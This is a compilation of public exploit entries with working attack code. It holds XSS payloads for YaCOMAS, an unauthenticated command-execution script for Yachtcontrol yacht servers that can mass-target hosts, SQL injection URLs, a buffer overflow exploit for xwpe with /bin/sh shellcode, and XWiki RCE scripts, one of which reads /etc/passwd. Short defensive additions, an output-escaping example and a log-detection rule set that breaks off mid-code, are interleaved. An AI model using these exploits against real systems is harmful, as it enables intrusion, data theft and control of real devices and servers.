support the position: 错误')</script></table>


#3. References
-----------------------------------------------------
https://pastebin.com/ia7U4vi9
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238
            
source: https://www.securityfocus.com/bid/47089/info

YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

YaCOMAS 0.3.6 is vulnerable; other versions may also be affected. 

===================================================================
    YaCOMAS 0.3.6 Multiple vulnerability
===================================================================
     
Software:   Yacomas 0.3.6
Vendor:     http://yacomas.sourceforge.net/
Vuln Type:  Multiple Vulnerability
Download link:  http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
Author:     Pr@fesOr X
contact:    profesor_x(at)otmail.com
Home:       www.ccat.edu.mx
Company:    Centro de Investigaciones en Alta Tecnologia
  
   
  
=========================
--Description  XSS  --
=========================
 
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
 
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
 
===============================
--= Attack details No. 1 =--
===============================
 
This vulnerability affects /yacomas/asistente/index.php.
 
 
http://www.site.com/yacomas/asistente/index.php?opc=1
 
 
--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
 
 
--The input is reflected inside a tag element between double quotes.
 
 
--details: you can inject this by sending the following POST data:
 
-----------------------
C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
------------------------
 
 
===============================
--= Vulnerable forms and variables =--
===============================
 
S_apellidos
s_ciudad
s_login
s_mail
s_nombrep
s_org
 
 
===============================
--= Attack XSS details No. 2 =--
===============================
 
http://www.site.com/yacomas/admin/index.php
 
 
--details: you can inject this by sending the following POST data (the body covered by the Content-Length: header):
 
------------------------------------------
 
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
 
-------------------------------------------------------------------
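Covering the funName reflection in the Yahei-PHP Prober advisory above (inside a JavaScript string in a script block) and the S_apellidos reflection here (inside a double-quoted attribute), this added Python example (not from either advisory; the HTML fragments around the two payloads are constructed) shows a renderer that reflects raw input beside a context-aware one, with an html.parser check that counts the script elements and input attributes each version produces.

```python
import html
import json
from html.parser import HTMLParser

# Payloads quoted in the two advisories; the HTML around them is constructed.
YAHEI_FUNNAME = "')</script><script>alert(\"1\");</script>"
YACOMAS_APELLIDOS = '" onmouseover=prompt(11111111111) bad="'

TEMPLATE = ('<input type="text" name="S_apellidos" value="%s" />\n'
            '<script>alert(%s)</script>')


def render_vulnerable(fun_name, apellidos):
    """Reflects raw input into a quoted attribute and into a JS string literal."""
    return TEMPLATE % (apellidos, "'%s'" % fun_name)


def js_string_literal(value):
    """JSON-encode for use inside <script>, and break '</' so the literal cannot
    terminate the script element (HTML ends it at '</script' regardless of JS quoting)."""
    return json.dumps(value).replace("</", "<\\/").replace("<!--", "<\\!--")


def render_fixed(fun_name, apellidos):
    """Encodes each value for the context it lands in."""
    return TEMPLATE % (html.escape(apellidos, quote=True), js_string_literal(fun_name))


class _Inspector(HTMLParser):
    """Counts <script> start tags and records the <input> element's attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_attrs = dict(attrs)


def inspect(rendered):
    """Return (number of script elements, attributes of the input element)."""
    p = _Inspector()
    p.feed(rendered)
    p.close()
    return p.script_tags, p.input_attrs


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        n, attrs = inspect(fn(YAHEI_FUNNAME, YACOMAS_APELLIDOS))
        print("%s: %d script element(s), input attributes %s" % (name, n, sorted(attrs)))
```

In the fixed output the attribute value round-trips unchanged through the parser while no onmouseover attribute appears, and the page keeps a single script element.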
 
 
==========================================
--= Attack XSS remote code execution No. 2 =--
==========================================
 
http://www.site.com/yacomas/admin/index.php
 
 
--details:  can you inyect this in the HTTP headers whit this data in the Content-Length: header
 
------------------------------------------
 
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
 
-------------------------------------------------------------------
            
# Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2019-12-06
# Exploit Author: Hodorsec
# Vendor Homepage: http://www.yachtcontrol.nl/en/
# Version: 1.0
# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06. No versioning system detected.
# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
# CVE: N/A
# 
# Description Product:
# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication, 
# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components. 
# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
#
# Description Vulnerability: 
# It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" 
# page and parameter, where {COMMAND} will be executed and returning the results to the client. 
# 
# Affected Components:
# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.

#!/usr/bin/python
import sys,os,requests

# Check arguments
if len(sys.argv) != 5:
    print "Error: enter at least one IP/FQDN as argument. Exiting..."
    print "\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n"
    exit(0)

# Parameters
host = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]
command = sys.argv[4]
timeout = 10
isFile = False

# Check for file or single IP/FQDN
if os.path.isfile(host):
    isFile = True
    with open(host) as f:
        targets = f.readlines()

# Vulnerable page
page = "/pages/systemcall.php?command="

# HTTP or HTTPS
if proto == "http":
    proto = "http://"
elif proto == "https":
    proto = "https://"
else:
    print "\nInvalid method given: enter http or https\n"
    exit(0)

# Do the request
if isFile:
    for host in targets:
        target = host.strip()
        print target
        try:
            response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
            print(response.content.replace('executing command: ' + command,''))
        except requests.exceptions.Timeout:
            print "Timed out."
            pass
        except requests.exceptions.RequestException as e:
            print "Host not found."
            pass
else:
    try:
        response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout)
        print(response.content.replace('executing command: ' + command,''))
    except requests.exceptions.Timeout:
        print "Timed out."
        pass
    except requests.exceptions.RequestException as e:
        print "Host not found."
        pass

#  Disclosure Timeline using CERT/CC disclosure policy:
#  - 06-10-19: Requested CVE
#  - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
#  - 12-10-19: Sent reminder due to no response
#  - 06-11-19: Sent second reminder due to no response
#  - 08-11-19: Received response requesting information, sent information
#  - 11-11-19: Correspondence concerning vulnerability
#  - 25-11-19: Sent reminder of publishing PoC to vendor, received response
#  - 05-12-19: Sent final reminder of publishing PoC to vendor
#  - 06-12-19: Public Disclosure
            
# # # # # 
# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/yacht-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
# Etc..
# # # # #
            
# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://xyzscripts.com/
# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-12

Product & Service Introduction:
===============================
XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.

Technical Details & Description:
================================

SQL injection on [view] URI parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)

==================
8bitsec - [https://twitter.com/_8bitsec]
            
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP: 0x42434441
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
#Error while running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0  0x42434441 in ?? ()
#1  0x4f4e2041 in ?? ()
#2  0x61732054 in ?? ()
#3  0x21646576 in ?? ()
#4  0x206f440a in ?? ()
#5  0x20756f79 in ?? ()
#6  0x746e6177 in ?? ()
#7  0x206f7420 in ?? ()
#8  0x65766173 in ?? ()
#9  0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()
#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2, argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()

import os, sys, errno, subprocess

def run():
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Argument layout: JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])

  except OSError as e:
    # errno module instead of the removed os.errno alias
    if e.errno == errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
  run()
            
# Exploit Title: XWorm Trojan 2.1 - Null Pointer Dereference DoS
# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
# Software Link: N/A
# Version: 2.1
# Tested on: Windows 10
# CVE : N/A

==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================
The XWorm Trojan is heavily used by EvilCoder, who bundle features such as ransomware and keylogger modules into it to make it more dangerous for victims. The component that handles victim connections suffers from a NULL pointer dereference, which can be turned into a denial of service against the threat actor's server builder once its command-and-control IP address and port are known.
==================================================================
WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES
==================================================================
(160.b98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c
eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
builder!XWorm.Client.isDisconnected+0xa9:
078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=????????
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

MethodDesc:   055a86b4
Method Name:  XWorm.Client.isDisconnected()
Class:        09fe9634
MethodTable:  055a86d8
mdToken:      06000730
Module:       01464044
IsJitted:     yes
CodeAddr:     078f59b0
Transparency: Critical
Failed to request MethodData, not in JIT code range

KEY_VALUES_STRING: 1

    Key  : AV.Dereference
    Value: NullPtr

    Key  : AV.Fault
    Value: Read

    Key  : Analysis.CPU.mSec
    Value: 6406

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 12344

    Key  : Analysis.IO.Other.Mb
    Value: 152

    Key  : Analysis.IO.Read.Mb
    Value: 3

    Key  : Analysis.IO.Write.Mb
    Value: 181

    Key  : Analysis.Init.CPU.mSec
    Value: 48905

    Key  : Analysis.Init.Elapsed.mSec
    Value: 6346579

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 200

    Key  : CLR.BuiltBy
    Value: NET48REL1LAST_C

    Key  : CLR.Engine
    Value: CLR

    Key  : CLR.Version
    Value: 4.8.4515.0

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 7496

    Key  : Timeline.Process.Start.DeltaSec
    Value: 6371

    Key  : WER.OS.Branch
    Value: vb_release

    Key  : WER.OS.Timestamp
    Value: 2019-12-06T14:06:00Z

    Key  : WER.OS.Version
    Value: 10.0.19041.1

    Key  : WER.Process.Version
    Value: 2.1.0.0


NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000000
Attempt to read from address 00000000

FAULTING_THREAD:  00000b98

PROCESS_NAME:  builder.exe

READ_ADDRESS:  00000000 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  00000000

IP_ON_HEAP:  078f5a59
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

STACK_TEXT:  
0113e568 73140556     00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9
0113e574 7314373a     0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113e5c8 7321f0d1     c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b
0113e608 7321f1d6     731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55
0113e90c 7212853c     00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838
0113e930 72114a9d     00000000 00000000 00000000 mscorlib_ni!
0113e94c 6e14bf55     00000000 00000000 00000000 mscorlib_ni!
0113e968 6e14be68     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e990 72118604     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e9f4 72118537     00000000 00000000 00000000 mscorlib_ni!
0113ea08 721184f4     00000000 00000000 00000000 mscorlib_ni!
0113ea24 6e14bdfa     00000000 00000000 00000000 mscorlib_ni!
0113ea40 6e14bb9a     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ea80 6e13b07f     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eacc 6e144931     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ead8 6e1445f7     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaec 6e13af53     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaf4 6e13aee5     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb08 6e13a820     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb58 0146d08e     00000000 00000000 00000000 System_Windows_Forms_ni!
WARNING: Frame IP not in any known module. Following frames may be wrong.
0113eb8c 7650148b     000606f4 0000c250 00000000 0x146d08e
0113ebb8 764f844a     05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b
0113ec9c 764f61ba     05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a
0113ed10 764f5f80     0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a
0113ed1c 6e19e5ed     0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10
0113ed58 6e14b44f     00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed
0113eddc 6e14b03d     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee30 6e14ae93     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee5c 014b2694     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee84 014b2211     00000000 00000000 00000000 0x14b2694
0113eeac 014b1871     00000000 00000000 00000000 0x14b2211
0113eef8 014b08b7     00000000 00000000 00000000 0x14b1871
0113ef28 73140556     00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f
0113ef34 7314373a     0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113ef88 73149adb     00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b
0113eff0 732bff7b     0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a
0113f114 732c065a     0113f158 00000000 c8874096 clr!RunMain+0x1b3
0113f380 732c0587     00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7
0113f864 732c0708     c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef
0113f8bc 732c082e     c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c
0113f8fc 732bc235     c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc
0113f938 7398fa84     84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d
0113f970 73a1e81e     73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6
0113f980 73a24338     73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e
0113f998 76b600f9     00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8
0113f998 77997bbe     00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19
0113f9f4 77997b8e     ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f
0113fa04 00000000     00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  ~0s ; .cxr ; kb

SYMBOL_NAME:  builder!XWorm.Client.isDisconnected+a9

MODULE_NAME: builder

IMAGE_NAME:  builder.exe

FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x86

OSNAME:  Windows 10

IMAGE_VERSION:  2.1.0.0

FAILURE_ID_HASH:  {ab0d02c5-881b-c628-2858-a241c5c41b1f}

Followup:     MachineOwner
---------

TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)
            
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292

from argparse import ArgumentParser
import sys
import logging
from requests import get, post, RequestException
import validators

# Constants
CVE_NAME = "CVE-2023-48292"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}

# Configure logging
def setup_logging(logfile):
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)

    # Create a logging handler for console output
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(console_handler)

    # Create a logging handler for file output
    file_handler = logging.FileHandler(logfile)
    file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(file_handler)

def validate_url(url):
    """
    Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
    """
    if not validators.url(url):
        logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
        sys.exit(1)
    return url.rstrip("/")

def check_vulnerability(target_url, method):
    """
    Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
    We send a test payload and inspect the response to determine if the vulnerability exists.
    """
    try:
        # Test payload to check for vulnerability
        test_payload = "echo 'testtesttest1234'"  # Payload to execute a test command on the target system
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200 and "testtesttest1234" in response.text:
            logging.info("Target is vulnerable! Command execution test succeeded.")
            return True
        else:
            logging.info("Target does not appear to be vulnerable.")
            return False
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def perform_attack(target_url, payload, method):
    """
    Perform the attack by sending a custom payload to the vulnerable server.
    """
    try:
        logging.info(f"Attempting attack with payload: {payload}")
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200:
            logging.info(f"Attack successful! Response: {response.text[:100]}...")  # Display a snippet of the response
        else:
            logging.warning("Attack attempt failed.")
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def main():
    """
    Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
    """
    parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
    parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
    parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
    parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
    parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
    parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
    args = parser.parse_args()

    # Set up logging to file and console
    setup_logging(args.logfile)

    # Validate the target URL
    target_url = validate_url(args.target)

    logging.info("Checking the target for vulnerability...")
    if check_vulnerability(target_url, args.method):
        if args.exploit:
            # Perform the attack with the provided payload
            perform_attack(target_url, args.payload, args.method)
        else:
            logging.info("Run with '--exploit' to attempt the attack.")
    else:
        logging.warning("The target is not vulnerable. Exiting.")

if __name__ == "__main__":
    main()
            
# Exploit Title: XWiki Platform - Remote Code Execution
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-24893
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://github.com/xwiki/xwiki-platform
# Version: Affected versions up to and including XWiki 15.10.10
# Tested Versions: XWiki 15.10.10
# Vulnerability Type: Remote Code Execution (RCE)
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Description:
# XWiki Platform suffers from a critical vulnerability where any guest user can
# execute arbitrary code remotely through the SolrSearch endpoint. This can lead
# to a full server compromise, including the ability to execute commands on the
# underlying system. The vulnerability impacts the confidentiality, integrity,
# and availability of the XWiki installation. The issue has been patched in XWiki
# versions 15.10.11, 16.4.1, and 16.5.0RC1.
# Proof of Concept: Yes
# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
# References:
# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
# - GitHub Exploit Link: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py

import requests

# Banner
def display_banner():
    print("=" * 80)
    print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution")
    print("Exploit Author: Al Baradi Joy")
    print("GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
    print("=" * 80)

# Function to detect the target protocol (HTTP or HTTPS)
def detect_protocol(domain):
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"

    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[+] Target supports HTTPS: {https_url}")
            return https_url
    except requests.exceptions.RequestException:
        print("[!] HTTPS not available, falling back to HTTP.")

    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[+] Target supports HTTP: {http_url}")
            return http_url
    except requests.exceptions.RequestException:
        pass

    # Reached when neither scheme answered with a usable status
    print("[-] Target is unreachable on both HTTP and HTTPS.")
    exit(1)

# Exploit function
def exploit(target_url):
    target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip())
    exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"

    try:
        print(f"[+] Sending request to: {exploit_url}")
        response = requests.get(exploit_url, timeout=10)

        # Check if the exploit was successful
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful! Output received:")
            print(response.text)
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")

    except requests.exceptions.ConnectionError:
        print("[-] Connection failed. Target may be down.")
    except requests.exceptions.Timeout:
        print("[-] Request timed out. Target is slow or unresponsive.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Unexpected error: {e}")

# Main execution
if __name__ == "__main__":
    display_banner()
    target = input("[?] Enter the target URL (without http/https): ").strip()
    exploit(target)
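Detection logic for the three command-execution endpoints described on this page (the Yachtcontrol `systemcall.php?command=` parameter, the XWiki Admin Tools `RunShellCommand` URL used by the CVE-2023-48292 script, and the SolrSearch `text=` macro injection shown just above), run over constructed access-log lines. This is an added example, not code from any of the advisories; the log lines, addresses and timestamps are made up, and the rule names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format (Apache/nginx default): client, identity, user, [time],
# "METHOD target protocol", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def _is_wiki_macro(value):
    """The SolrSearch PoC closes the search text with }}} and opens
    {{async}}{{groovy}} macros; parse_qs has already URL-decoded the value."""
    v = value.lower()
    return any(opener in v for opener in ("{{groovy", "{{async", "{{velocity"))

# (rule name, path predicate, query parameter to inspect, value predicate)
RULES = [
    ("yachtcontrol-systemcall",
     lambda p: p.endswith("/pages/systemcall.php"), "command", lambda v: True),
    ("xwiki-admintools-runshellcommand",
     lambda p: p.lower().endswith("/admin/runshellcommand"), "command", lambda v: True),
    ("xwiki-solrsearch-macro-injection",
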